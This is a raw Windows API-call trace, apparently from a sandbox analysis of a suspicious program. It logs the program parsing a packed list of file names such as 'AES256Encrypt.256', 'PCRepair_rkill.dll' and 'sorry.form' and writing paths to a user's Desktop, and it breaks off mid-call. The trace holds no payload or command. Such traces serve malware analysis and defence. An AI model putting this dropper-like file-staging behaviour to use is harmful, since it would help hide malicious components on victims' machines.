[0076.032] SetLastError (dwErrCode=0x0) [0076.032] GetLastError () returned 0x0 [0076.032] SetLastError (dwErrCode=0x0) [0076.032] GetLastError () returned 0x0 [0076.032] SetLastError (dwErrCode=0x0) [0076.032] wcsncmp (_String1="S", _String2="?", _MaxCount=0x1) returned 20 [0076.033] wcsncmp (_String1="a", _String2="?", _MaxCount=0x1) returned 34 [0076.033] wcsncmp (_String1="f", _String2="?", _MaxCount=0x1) returned 39 [0076.033] wcsncmp (_String1="e", _String2="?", _MaxCount=0x1) returned 38 [0076.033] wcsncmp (_String1="P", _String2="?", _MaxCount=0x1) returned 17 [0076.033] wcsncmp (_String1="C", _String2="?", _MaxCount=0x1) returned 4 [0076.033] wcsncmp (_String1="_", _String2="?", _MaxCount=0x1) returned 32 [0076.033] wcsncmp (_String1="v", _String2="?", _MaxCount=0x1) returned 55 [0076.033] wcsncmp (_String1="e", _String2="?", _MaxCount=0x1) returned 38 [0076.033] wcsncmp (_String1="r", _String2="?", _MaxCount=0x1) returned 51 [0076.033] wcsncmp (_String1="1", _String2="?", _MaxCount=0x1) returned -14 [0076.033] wcsncmp (_String1=".", _String2="?", _MaxCount=0x1) returned -17 [0076.033] wcsncmp (_String1="0", _String2="?", _MaxCount=0x1) returned -15 [0076.033] wcsncmp (_String1=".", _String2="?", _MaxCount=0x1) returned -17 [0076.033] wcsncmp (_String1="d", _String2="?", _MaxCount=0x1) returned 37 [0076.033] wcsncmp (_String1="l", _String2="?", _MaxCount=0x1) returned 45 [0076.033] wcsncmp (_String1="l", _String2="?", _MaxCount=0x1) returned 45 [0076.041] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x2c) returned 0x2a68af8 [0076.042] GetLastError () returned 0x0 [0076.042] SetLastError (dwErrCode=0x0) [0076.042] wcslen (_String="SafePC_ver1.0.dll") returned 0x11 [0076.042] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x2c) returned 0x2a69be8 [0076.042] GetLastError () returned 0x0 [0076.042] SetLastError (dwErrCode=0x0) [0076.042] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\HexIF.hex\r\nC:\\Users\\FD1HVy\\Desktop\\HexLK.hex\r\nC:\\Users\\FD1HVy\\Desktop\\rd000db.dll\r\n") returned 0x6b [0076.042] wcslen (_String="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0076.042] wcslen (_String="\\") returned 0x1 [0076.042] wcslen (_String="SafePC_ver1.0.dll") returned 0x11 [0076.042] wcslen (_String="\r\n") returned 0x2 [0076.042] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a6abc8, Size=0x136) returned 0x2a6abc8 [0076.042] GetLastError () returned 0x0 [0076.042] SetLastError (dwErrCode=0x0) [0076.042] GetLastError () returned 0x0 [0076.042] SetLastError (dwErrCode=0x0) [0076.042] wcsncpy (in: _Dest=0x2a60608, _Source="19488*AES256Encrypt.256:32:*34918*PCRepair_rkill.dll:32:*860610*Hexadecimal_Calculator.ns:32:*12570*sorry.form:32:*792925*HexDCIF.hex:32:*55867*", _Count=0x5 | out: _Dest="19488ers\\FD1HVy\\Desktop\\HexIF.hex\r\nC:\\Users\\FD1HVy\\Desktop\\HexLK.hex\r\nC:\\Users\\FD1HVy\\Desktop\\rd000db.dll\r\nC:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll\r\n") returned="19488ers\\FD1HVy\\Desktop\\HexIF.hex\r\nC:\\Users\\FD1HVy\\Desktop\\HexLK.hex\r\nC:\\Users\\FD1HVy\\Desktop\\rd000db.dll\r\nC:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll\r\n" [0076.042] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x14) returned 0x2a68af8 [0076.042] wcsstr (_Str="19488", _SubStr=":") returned 0x0 [0076.043] GetLastError () returned 0x0 [0076.043] SetLastError (dwErrCode=0x0) [0076.043] GetLastError () returned 0x0 [0076.043] SetLastError (dwErrCode=0x0) [0076.043] wcsncpy (in: _Dest=0x2a60608, _Source="AES256Encrypt.256:32:*34918*PCRepair_rkill.dll:32:*860610*Hexadecimal_Calculator.ns:32:*12570*sorry.form:32:*792925*HexDCIF.hex:32:*55867*", _Count=0x15 | out: _Dest="AES256Encrypt.256:32:op\\HexIF.hex\r\nC:\\Users\\FD1HVy\\Desktop\\HexLK.hex\r\nC:\\Users\\FD1HVy\\Desktop\\rd000db.dll\r\nC:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll\r\n") returned="AES256Encrypt.256:32:op\\HexIF.hex\r\nC:\\Users\\FD1HVy\\Desktop\\HexLK.hex\r\nC:\\Users\\FD1HVy\\Desktop\\rd000db.dll\r\nC:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll\r\n" [0076.043] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x34) returned 0x2a68af8 [0076.043] wcsstr (_Str="AES256Encrypt.256:32:", _SubStr=":") returned=":32:" [0076.043] GetLastError () returned 0x0 [0076.043] SetLastError (dwErrCode=0x0) [0076.043] GetLastError () returned 0x0 [0076.043] SetLastError (dwErrCode=0x0) [0076.043] wcsncpy (in: _Dest=0x2a60608, _Source="32:", _Count=0x2 | out: _Dest="32S256Encrypt.256:32:") returned="32S256Encrypt.256:32:" [0076.043] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67780, Size=0xe) returned 0x2a676f0 [0076.043] GetLastError () returned 0x0 [0076.043] SetLastError (dwErrCode=0x0) [0076.043] GetLastError () returned 0x0 [0076.043] SetLastError (dwErrCode=0x0) [0076.043] wcsncpy (in: _Dest=0x2a60608, _Source="AES256Encrypt.256:32:", _Count=0x11 | out: _Dest="AES256Encrypt.256:32:") returned="AES256Encrypt.256:32:" [0076.043] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x2c) returned 0x2a68af8 [0076.043] GetLastError () returned 0x0 [0076.044] SetLastError (dwErrCode=0x0) [0076.044] GetLastError () returned 0x0 [0076.044] SetLastError (dwErrCode=0x0) [0076.044] GetLastError () returned 0x0 [0076.044] SetLastError (dwErrCode=0x0) [0076.044] GetLastError () returned 0x0 [0076.044] SetLastError (dwErrCode=0x0) [0076.044] wcsncmp (_String1="A", _String2="?", _MaxCount=0x1) returned 2 [0076.044] wcsncmp (_String1="E", _String2="?", _MaxCount=0x1) returned 6 [0076.044] wcsncmp (_String1="S", _String2="?", _MaxCount=0x1) returned 20 [0076.044] wcsncmp (_String1="2", _String2="?", _MaxCount=0x1) returned -13 [0076.044] wcsncmp (_String1="5", _String2="?", _MaxCount=0x1) returned -10 [0076.044] wcsncmp (_String1="6", _String2="?", _MaxCount=0x1) returned -9 [0076.044] wcsncmp (_String1="E", _String2="?", _MaxCount=0x1) returned 6 [0076.044] wcsncmp (_String1="n", _String2="?", _MaxCount=0x1) returned 47 [0076.044] wcsncmp (_String1="c", _String2="?", _MaxCount=0x1) returned 36 [0076.044] wcsncmp (_String1="r", _String2="?", _MaxCount=0x1) returned 51 [0076.044] wcsncmp (_String1="y", _String2="?", _MaxCount=0x1) returned 58 [0076.044] wcsncmp (_String1="p", _String2="?", _MaxCount=0x1) returned 49 [0076.044] wcsncmp (_String1="t", _String2="?", _MaxCount=0x1) returned 53 [0076.044] wcsncmp (_String1=".", _String2="?", _MaxCount=0x1) returned -17 [0076.044] wcsncmp (_String1="2", _String2="?", _MaxCount=0x1) returned -13 [0076.045] wcsncmp (_String1="5", _String2="?", _MaxCount=0x1) returned -10 [0076.045] wcsncmp (_String1="6", _String2="?", _MaxCount=0x1) returned -9 [0076.045] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x2c) returned 0x2a68af8 [0076.045] GetLastError () returned 0x0 [0076.045] SetLastError (dwErrCode=0x0) [0076.045] wcslen (_String="AES256Encrypt.256") returned 0x11 [0076.045] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x2c) returned 0x2a69c20 [0076.045] GetLastError () returned 0x0 [0076.045] SetLastError (dwErrCode=0x0) [0076.045] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\HexIF.hex\r\nC:\\Users\\FD1HVy\\Desktop\\HexLK.hex\r\nC:\\Users\\FD1HVy\\Desktop\\rd000db.dll\r\nC:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll\r\n") returned 0x96 [0076.045] wcslen (_String="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0076.046] wcslen (_String="\\") returned 0x1 [0076.046] wcslen (_String="AES256Encrypt.256") returned 0x11 [0076.046] wcslen (_String="\r\n") returned 0x2 [0076.046] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a6abc8, Size=0x18c) returned 0x2a6abc8 [0076.046] GetLastError () returned 0x0 [0076.046] SetLastError (dwErrCode=0x0) [0076.046] GetLastError () returned 0x0 [0076.046] SetLastError (dwErrCode=0x0) [0076.046] wcsncpy (in: _Dest=0x2a60608, _Source="34918*PCRepair_rkill.dll:32:*860610*Hexadecimal_Calculator.ns:32:*12570*sorry.form:32:*792925*HexDCIF.hex:32:*55867*", _Count=0x5 | out: _Dest="34918ers\\FD1HVy\\Desktop\\HexIF.hex\r\nC:\\Users\\FD1HVy\\Desktop\\HexLK.hex\r\nC:\\Users\\FD1HVy\\Desktop\\rd000db.dll\r\nC:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll\r\nC:\\Users\\FD1HVy\\Desktop\\AES256Encrypt.256\r\n") returned="34918ers\\FD1HVy\\Desktop\\HexIF.hex\r\nC:\\Users\\FD1HVy\\Desktop\\HexLK.hex\r\nC:\\Users\\FD1HVy\\Desktop\\rd000db.dll\r\nC:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll\r\nC:\\Users\\FD1HVy\\Desktop\\AES256Encrypt.256\r\n" [0076.046] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x14) returned 0x2a68af8 [0076.046] wcsstr (_Str="34918", _SubStr=":") returned 0x0 [0076.046] GetLastError () returned 0x0 [0076.046] SetLastError (dwErrCode=0x0) [0076.046] GetLastError () returned 0x0 [0076.046] SetLastError (dwErrCode=0x0) [0076.047] wcsncpy (in: _Dest=0x2a60608, _Source="PCRepair_rkill.dll:32:*860610*Hexadecimal_Calculator.ns:32:*12570*sorry.form:32:*792925*HexDCIF.hex:32:*55867*", _Count=0x16 | out: _Dest="PCRepair_rkill.dll:32:p\\HexIF.hex\r\nC:\\Users\\FD1HVy\\Desktop\\HexLK.hex\r\nC:\\Users\\FD1HVy\\Desktop\\rd000db.dll\r\nC:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll\r\nC:\\Users\\FD1HVy\\Desktop\\AES256Encrypt.256\r\n") returned="PCRepair_rkill.dll:32:p\\HexIF.hex\r\nC:\\Users\\FD1HVy\\Desktop\\HexLK.hex\r\nC:\\Users\\FD1HVy\\Desktop\\rd000db.dll\r\nC:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll\r\nC:\\Users\\FD1HVy\\Desktop\\AES256Encrypt.256\r\n" [0076.047] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x36) returned 0x2a68af8 [0076.047] wcsstr (_Str="PCRepair_rkill.dll:32:", _SubStr=":") returned=":32:" [0076.047] GetLastError () returned 0x0 [0076.047] SetLastError (dwErrCode=0x0) [0076.047] GetLastError () returned 0x0 [0076.047] SetLastError (dwErrCode=0x0) [0076.047] wcsncpy (in: _Dest=0x2a60608, _Source="32:", _Count=0x2 | out: _Dest="32Repair_rkill.dll:32:") returned="32Repair_rkill.dll:32:" [0076.047] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a676f0, Size=0xe) returned 0x2a67870 [0076.047] GetLastError () returned 0x0 [0076.047] SetLastError (dwErrCode=0x0) [0076.047] GetLastError () returned 0x0 [0076.047] SetLastError (dwErrCode=0x0) [0076.047] wcsncpy (in: _Dest=0x2a60608, _Source="PCRepair_rkill.dll:32:", _Count=0x12 | out: _Dest="PCRepair_rkill.dll:32:") returned="PCRepair_rkill.dll:32:" [0076.047] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x2e) returned 0x2a68af8 [0076.047] GetLastError () returned 0x0 [0076.047] SetLastError (dwErrCode=0x0) [0076.047] GetLastError () returned 0x0 [0076.047] SetLastError (dwErrCode=0x0) [0076.048] GetLastError () returned 0x0 [0076.048] SetLastError (dwErrCode=0x0) [0076.048] GetLastError () returned 0x0 [0076.048] SetLastError (dwErrCode=0x0) [0076.048] wcsncmp (_String1="P", _String2="?", _MaxCount=0x1) returned 17 [0076.048] wcsncmp (_String1="C", _String2="?", _MaxCount=0x1) returned 4 [0076.048] wcsncmp (_String1="R", _String2="?", _MaxCount=0x1) returned 19 [0076.048] wcsncmp (_String1="e", _String2="?", _MaxCount=0x1) returned 38 [0076.048] wcsncmp (_String1="p", _String2="?", _MaxCount=0x1) returned 49 [0076.048] wcsncmp (_String1="a", _String2="?", _MaxCount=0x1) returned 34 [0076.048] wcsncmp (_String1="i", _String2="?", _MaxCount=0x1) returned 42 [0076.048] wcsncmp (_String1="r", _String2="?", _MaxCount=0x1) returned 51 [0076.048] wcsncmp (_String1="_", _String2="?", _MaxCount=0x1) returned 32 [0076.048] wcsncmp (_String1="r", _String2="?", _MaxCount=0x1) returned 51 [0076.048] wcsncmp (_String1="k", _String2="?", _MaxCount=0x1) returned 44 [0076.048] wcsncmp (_String1="i", _String2="?", _MaxCount=0x1) returned 42 [0076.048] wcsncmp (_String1="l", _String2="?", _MaxCount=0x1) returned 45 [0076.048] wcsncmp (_String1="l", _String2="?", _MaxCount=0x1) returned 45 [0076.048] wcsncmp (_String1=".", _String2="?", _MaxCount=0x1) returned -17 [0076.048] wcsncmp (_String1="d", _String2="?", _MaxCount=0x1) returned 37 [0076.048] wcsncmp (_String1="l", _String2="?", _MaxCount=0x1) returned 45 [0076.048] wcsncmp (_String1="l", _String2="?", _MaxCount=0x1) returned 45 [0076.049] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x2e) returned 0x2a68af8 [0076.049] GetLastError () returned 0x0 [0076.049] SetLastError (dwErrCode=0x0) [0076.049] wcslen (_String="PCRepair_rkill.dll") returned 0x12 [0076.049] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x2e) returned 0x2a6ad60 [0076.049] GetLastError () returned 0x0 [0076.049] SetLastError (dwErrCode=0x0) [0076.049] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\HexIF.hex\r\nC:\\Users\\FD1HVy\\Desktop\\HexLK.hex\r\nC:\\Users\\FD1HVy\\Desktop\\rd000db.dll\r\nC:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll\r\nC:\\Users\\FD1HVy\\Desktop\\AES256Encrypt.256\r\n") returned 0xc1 [0076.049] wcslen (_String="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0076.049] wcslen (_String="\\") returned 0x1 [0076.049] wcslen (_String="PCRepair_rkill.dll") returned 0x12 [0076.049] wcslen (_String="\r\n") returned 0x2 [0076.049] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a6abc8, Size=0x1e4) returned 0x2a6ad98 [0076.049] GetLastError () returned 0x0 [0076.049] SetLastError (dwErrCode=0x0) [0076.049] GetLastError () returned 0x0 [0076.049] SetLastError (dwErrCode=0x0) [0076.050] wcsncpy (in: _Dest=0x2a60608, _Source="860610*Hexadecimal_Calculator.ns:32:*12570*sorry.form:32:*792925*HexDCIF.hex:32:*55867*", _Count=0x6 | out: _Dest="860610rs\\FD1HVy\\Desktop\\HexIF.hex\r\nC:\\Users\\FD1HVy\\Desktop\\HexLK.hex\r\nC:\\Users\\FD1HVy\\Desktop\\rd000db.dll\r\nC:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll\r\nC:\\Users\\FD1HVy\\Desktop\\AES256Encrypt.256\r\nC:\\Users\\FD1HVy\\Desktop\\PCRepair_rkill.dll\r\n") returned="860610rs\\FD1HVy\\Desktop\\HexIF.hex\r\nC:\\Users\\FD1HVy\\Desktop\\HexLK.hex\r\nC:\\Users\\FD1HVy\\Desktop\\rd000db.dll\r\nC:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll\r\nC:\\Users\\FD1HVy\\Desktop\\AES256Encrypt.256\r\nC:\\Users\\FD1HVy\\Desktop\\PCRepair_rkill.dll\r\n" [0076.050] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x16) returned 0x2a68af8 [0076.050] wcsstr (_Str="860610", _SubStr=":") returned 0x0 [0076.050] GetLastError () returned 0x0 [0076.050] SetLastError (dwErrCode=0x0) [0076.050] GetLastError () returned 0x0 [0076.050] SetLastError (dwErrCode=0x0) [0076.050] wcsncpy (in: _Dest=0x2a60608, _Source="Hexadecimal_Calculator.ns:32:*12570*sorry.form:32:*792925*HexDCIF.hex:32:*55867*", _Count=0x1d | out: _Dest="Hexadecimal_Calculator.ns:32:.hex\r\nC:\\Users\\FD1HVy\\Desktop\\HexLK.hex\r\nC:\\Users\\FD1HVy\\Desktop\\rd000db.dll\r\nC:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll\r\nC:\\Users\\FD1HVy\\Desktop\\AES256Encrypt.256\r\nC:\\Users\\FD1HVy\\Desktop\\PCRepair_rkill.dll\r\n") returned="Hexadecimal_Calculator.ns:32:.hex\r\nC:\\Users\\FD1HVy\\Desktop\\HexLK.hex\r\nC:\\Users\\FD1HVy\\Desktop\\rd000db.dll\r\nC:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll\r\nC:\\Users\\FD1HVy\\Desktop\\AES256Encrypt.256\r\nC:\\Users\\FD1HVy\\Desktop\\PCRepair_rkill.dll\r\n" [0076.050] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x44) returned 0x2a68af8 [0076.050] wcsstr (_Str="Hexadecimal_Calculator.ns:32:", _SubStr=":") returned=":32:" [0076.050] GetLastError () returned 0x0 [0076.050] SetLastError (dwErrCode=0x0) [0076.050] GetLastError () returned 0x0 [0076.050] SetLastError (dwErrCode=0x0) [0076.050] wcsncpy (in: _Dest=0x2a60608, _Source="32:", _Count=0x2 | out: _Dest="32xadecimal_Calculator.ns:32:") returned="32xadecimal_Calculator.ns:32:" [0076.050] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67870, Size=0xe) returned 0x2a67810 [0076.050] GetLastError () returned 0x0 [0076.050] SetLastError (dwErrCode=0x0) [0076.051] GetLastError () returned 0x0 [0076.051] SetLastError (dwErrCode=0x0) [0076.068] wcsncpy (in: _Dest=0x2a60608, _Source="Hexadecimal_Calculator.ns:32:", _Count=0x19 | out: _Dest="Hexadecimal_Calculator.ns:32:") returned="Hexadecimal_Calculator.ns:32:" [0076.214] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x3c) returned 0x2a68af8 [0076.214] GetLastError () returned 0x0 [0076.215] SetLastError (dwErrCode=0x0) [0076.215] GetLastError () returned 0x0 [0076.215] SetLastError (dwErrCode=0x0) [0076.215] GetLastError () returned 0x0 [0076.215] SetLastError (dwErrCode=0x0) [0076.218] GetLastError () returned 0x0 [0076.218] SetLastError (dwErrCode=0x0) [0076.218] wcsncmp (_String1="H", _String2="?", _MaxCount=0x1) returned 9 [0076.219] wcsncmp (_String1="e", _String2="?", _MaxCount=0x1) returned 38 [0076.219] wcsncmp (_String1="x", _String2="?", _MaxCount=0x1) returned 57 [0076.219] wcsncmp (_String1="a", _String2="?", _MaxCount=0x1) returned 34 [0076.219] wcsncmp (_String1="d", _String2="?", _MaxCount=0x1) returned 37 [0076.219] wcsncmp (_String1="e", _String2="?", _MaxCount=0x1) returned 38 [0076.219] wcsncmp (_String1="c", _String2="?", _MaxCount=0x1) returned 36 [0076.219] wcsncmp (_String1="i", _String2="?", _MaxCount=0x1) returned 42 [0076.219] wcsncmp (_String1="m", _String2="?", _MaxCount=0x1) returned 46 [0076.219] wcsncmp (_String1="a", _String2="?", _MaxCount=0x1) returned 34 [0076.219] wcsncmp (_String1="l", _String2="?", _MaxCount=0x1) returned 45 [0076.219] wcsncmp (_String1="_", _String2="?", _MaxCount=0x1) returned 32 [0076.219] wcsncmp (_String1="C", _String2="?", _MaxCount=0x1) returned 4 [0076.219] wcsncmp (_String1="a", _String2="?", _MaxCount=0x1) returned 34 [0076.219] wcsncmp (_String1="l", _String2="?", _MaxCount=0x1) returned 45 [0076.219] wcsncmp (_String1="c", _String2="?", _MaxCount=0x1) returned 36 [0076.219] wcsncmp (_String1="u", _String2="?", _MaxCount=0x1) returned 54 [0076.219] wcsncmp (_String1="l", _String2="?", _MaxCount=0x1) returned 45 [0076.219] wcsncmp (_String1="a", _String2="?", _MaxCount=0x1) returned 34 [0076.219] wcsncmp (_String1="t", _String2="?", _MaxCount=0x1) returned 53 [0076.219] wcsncmp (_String1="o", _String2="?", _MaxCount=0x1) returned 48 [0076.220] wcsncmp (_String1="r", _String2="?", _MaxCount=0x1) returned 51 [0076.220] wcsncmp (_String1=".", _String2="?", _MaxCount=0x1) returned -17 [0076.220] wcsncmp (_String1="n", _String2="?", _MaxCount=0x1) returned 47 [0076.220] wcsncmp (_String1="s", _String2="?", _MaxCount=0x1) returned 52 [0076.220] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x3c) returned 0x2a68af8 [0076.220] GetLastError () returned 0x0 [0076.220] SetLastError (dwErrCode=0x0) [0076.220] wcslen (_String="Hexadecimal_Calculator.ns") returned 0x19 [0076.220] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x3c) returned 0x2a68cd8 [0076.220] GetLastError () returned 0x0 [0076.220] SetLastError (dwErrCode=0x0) [0076.220] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\HexIF.hex\r\nC:\\Users\\FD1HVy\\Desktop\\HexLK.hex\r\nC:\\Users\\FD1HVy\\Desktop\\rd000db.dll\r\nC:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll\r\nC:\\Users\\FD1HVy\\Desktop\\AES256Encrypt.256\r\nC:\\Users\\FD1HVy\\Desktop\\PCRepair_rkill.dll\r\n") returned 0xed [0076.220] wcslen (_String="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0076.220] wcslen (_String="\\") returned 0x1 [0076.220] wcslen (_String="Hexadecimal_Calculator.ns") returned 0x19 [0076.220] wcslen (_String="\r\n") returned 0x2 [0076.220] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a6ad98, Size=0x24a) returned 0x2a6ad98 [0076.220] GetLastError () returned 0x0 [0076.221] SetLastError (dwErrCode=0x0) [0076.221] GetLastError () returned 0x0 [0076.221] SetLastError (dwErrCode=0x0) [0076.221] wcsncpy (in: _Dest=0x2a60608, _Source="12570*sorry.form:32:*792925*HexDCIF.hex:32:*55867*", _Count=0x5 | out: _Dest="12570ers\\FD1HVy\\Desktop\\HexIF.hex\r\nC:\\Users\\FD1HVy\\Desktop\\HexLK.hex\r\nC:\\Users\\FD1HVy\\Desktop\\rd000db.dll\r\nC:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll\r\nC:\\Users\\FD1HVy\\Desktop\\AES256Encrypt.256\r\nC:\\Users\\FD1HVy\\Desktop\\PCRepair_rkill.dll\r\nC:\\Users\\FD1HVy\\Desktop\\Hexadecimal_Calculator.ns\r\n") returned="12570ers\\FD1HVy\\Desktop\\HexIF.hex\r\nC:\\Users\\FD1HVy\\Desktop\\HexLK.hex\r\nC:\\Users\\FD1HVy\\Desktop\\rd000db.dll\r\nC:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll\r\nC:\\Users\\FD1HVy\\Desktop\\AES256Encrypt.256\r\nC:\\Users\\FD1HVy\\Desktop\\PCRepair_rkill.dll\r\nC:\\Users\\FD1HVy\\Desktop\\Hexadecimal_Calculator.ns\r\n" [0076.221] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x14) returned 0x2a68af8 [0076.221] wcsstr (_Str="12570", _SubStr=":") returned 0x0 [0076.221] GetLastError () returned 0x0 [0076.221] SetLastError (dwErrCode=0x0) [0076.221] GetLastError () returned 0x0 [0076.222] SetLastError (dwErrCode=0x0) [0076.222] wcsncpy (in: _Dest=0x2a60608, _Source="sorry.form:32:*792925*HexDCIF.hex:32:*55867*", _Count=0xe | out: _Dest="sorry.form:32:y\\Desktop\\HexIF.hex\r\nC:\\Users\\FD1HVy\\Desktop\\HexLK.hex\r\nC:\\Users\\FD1HVy\\Desktop\\rd000db.dll\r\nC:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll\r\nC:\\Users\\FD1HVy\\Desktop\\AES256Encrypt.256\r\nC:\\Users\\FD1HVy\\Desktop\\PCRepair_rkill.dll\r\nC:\\Users\\FD1HVy\\Desktop\\Hexadecimal_Calculator.ns\r\n") returned="sorry.form:32:y\\Desktop\\HexIF.hex\r\nC:\\Users\\FD1HVy\\Desktop\\HexLK.hex\r\nC:\\Users\\FD1HVy\\Desktop\\rd000db.dll\r\nC:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll\r\nC:\\Users\\FD1HVy\\Desktop\\AES256Encrypt.256\r\nC:\\Users\\FD1HVy\\Desktop\\PCRepair_rkill.dll\r\nC:\\Users\\FD1HVy\\Desktop\\Hexadecimal_Calculator.ns\r\n" [0076.222] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x26) returned 0x2a68af8 [0076.222] wcsstr (_Str="sorry.form:32:", _SubStr=":") returned=":32:" [0076.222] GetLastError () returned 0x0 [0076.222] SetLastError (dwErrCode=0x0) [0076.222] GetLastError () returned 0x0 [0076.222] SetLastError (dwErrCode=0x0) [0076.222] wcsncpy (in: _Dest=0x2a60608, _Source="32:", _Count=0x2 | out: _Dest="32rry.form:32:") returned="32rry.form:32:" [0076.222] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67810, Size=0xe) returned 0x2a67828 [0076.222] GetLastError () returned 0x0 [0076.222] SetLastError (dwErrCode=0x0) [0076.222] GetLastError () returned 0x0 [0076.222] SetLastError (dwErrCode=0x0) [0076.222] wcsncpy (in: _Dest=0x2a60608, _Source="sorry.form:32:", _Count=0xa | out: _Dest="sorry.form:32:") returned="sorry.form:32:" [0076.222] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x1e) returned 0x2a68af8 [0076.222] GetLastError () returned 0x0 [0076.223] SetLastError (dwErrCode=0x0) [0076.223] GetLastError () returned 0x0 [0076.223] SetLastError (dwErrCode=0x0) [0076.223] GetLastError () returned 0x0 [0076.223] SetLastError (dwErrCode=0x0) [0076.223] GetLastError () returned 0x0 [0076.223] SetLastError (dwErrCode=0x0) [0076.223] wcsncmp (_String1="s", _String2="?", _MaxCount=0x1) returned 52 [0076.223] wcsncmp (_String1="o", _String2="?", _MaxCount=0x1) returned 48 [0076.223] wcsncmp (_String1="r", _String2="?", _MaxCount=0x1) returned 51 [0076.223] wcsncmp (_String1="r", _String2="?", _MaxCount=0x1) returned 51 [0076.223] wcsncmp (_String1="y", _String2="?", _MaxCount=0x1) returned 58 [0076.223] wcsncmp (_String1=".", _String2="?", _MaxCount=0x1) returned -17 [0076.223] wcsncmp (_String1="f", _String2="?", _MaxCount=0x1) returned 39 [0076.223] wcsncmp (_String1="o", _String2="?", _MaxCount=0x1) returned 48 [0076.224] wcsncmp (_String1="r", _String2="?", _MaxCount=0x1) returned 51 [0076.224] wcsncmp (_String1="m", _String2="?", _MaxCount=0x1) returned 46 [0076.224] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x1e) returned 0x2a68af8 [0076.224] GetLastError () returned 0x0 [0076.224] SetLastError (dwErrCode=0x0) [0076.224] wcslen (_String="sorry.form") returned 0xa [0076.224] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a69ff0 [0076.224] GetLastError () returned 0x0 [0076.224] SetLastError (dwErrCode=0x0) [0076.224] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\HexIF.hex\r\nC:\\Users\\FD1HVy\\Desktop\\HexLK.hex\r\nC:\\Users\\FD1HVy\\Desktop\\rd000db.dll\r\nC:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll\r\nC:\\Users\\FD1HVy\\Desktop\\AES256Encrypt.256\r\nC:\\Users\\FD1HVy\\Desktop\\PCRepair_rkill.dll\r\nC:\\Users\\FD1HVy\\Desktop\\Hexadecimal_Calculator.ns\r\n") returned 0x120 [0076.224] wcslen (_String="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0076.224] wcslen (_String="\\") returned 0x1 [0076.225] wcslen (_String="sorry.form") returned 0xa [0076.225] wcslen (_String="\r\n") returned 0x2 [0076.225] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a6ad98, Size=0x292) returned 0x2a6ad98 [0076.225] GetLastError () returned 0x0 [0076.225] SetLastError (dwErrCode=0x0) [0076.225] GetLastError () returned 0x0 [0076.225] SetLastError 